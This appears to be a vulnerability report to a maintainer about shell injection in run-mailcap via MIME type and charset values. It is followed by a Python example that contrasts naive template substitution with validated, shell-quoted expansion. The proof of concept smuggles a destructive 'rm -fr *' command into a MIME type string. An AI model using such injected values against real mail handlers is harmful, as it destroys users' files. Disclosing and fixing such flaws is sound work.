Dear Maintainer,

run-mailcap is vulnerable to shell command injection in its input data. Specifically, commands can be injected into a MIME type name, a charset name, or other data originating from a Content-Type header.

If run-mailcap is used by some mail program or script for mailcap support, then a malicious message can cause the execution of arbitrary shell code just by being displayed.

(Test with --norun, at your own risk.)

-- rule
text/*; /usr/bin/w3m -T %t %s

-- exploit
$ type='text/$(rm -fr *)' # e.g. from a malicious mail header
$ run-mailcap --action=view "$type":filename
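
Added example (not part of the original report and not run-mailcap's own code): a mailcap template expander in Python that contrasts plain %t/%s substitution with a version that validates the type name and shell-quotes each value. The function names, the allowlist pattern and the sample inputs are assumptions constructed for illustration, and the template is assumed to use unquoted placeholders as in the rule above; nothing is executed, the command strings are only built.

```python
import re
import shlex

# Conservative allowlist for "type/subtype". This is an assumption of the
# example: it is narrower than the RFC 2045 token grammar, which permits
# shell-active characters such as '$' and '`' in a type name.
SAFE_TYPE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.+-]*/[A-Za-z0-9][A-Za-z0-9.+-]*")


def expand_naive(template, mime_type, filename):
    """Plain substitution: metacharacters in the inputs reach the shell."""
    return template.replace("%t", mime_type).replace("%s", filename)


def expand_safe(template, mime_type, filename):
    """Reject unexpected type names, then shell-quote each substituted value."""
    if not SAFE_TYPE.fullmatch(mime_type):
        raise ValueError("rejected MIME type: %r" % (mime_type,))
    values = {"%t": shlex.quote(mime_type), "%s": shlex.quote(filename)}
    # Single pass, so a substituted value is never rescanned for placeholders.
    return re.sub(r"%[ts]", lambda m: values[m.group(0)], template)


if __name__ == "__main__":
    rule = "/usr/bin/w3m -T %t %s"           # command part of the rule above
    hostile_type = "text/$(echo INJECTED)"   # constructed, harmless marker
    print("naive:", expand_naive(rule, hostile_type, "filename"))
    try:
        expand_safe(rule, hostile_type, "filename")
    except ValueError as exc:
        print("safe :", exc)
    # A hostile file name is kept as a single literal word by quoting.
    print("safe :", expand_safe(rule, "text/plain", "$(echo X).txt"))
```

The allowlist alone would not cover the file name or a charset value, which is why every substituted value is also quoted.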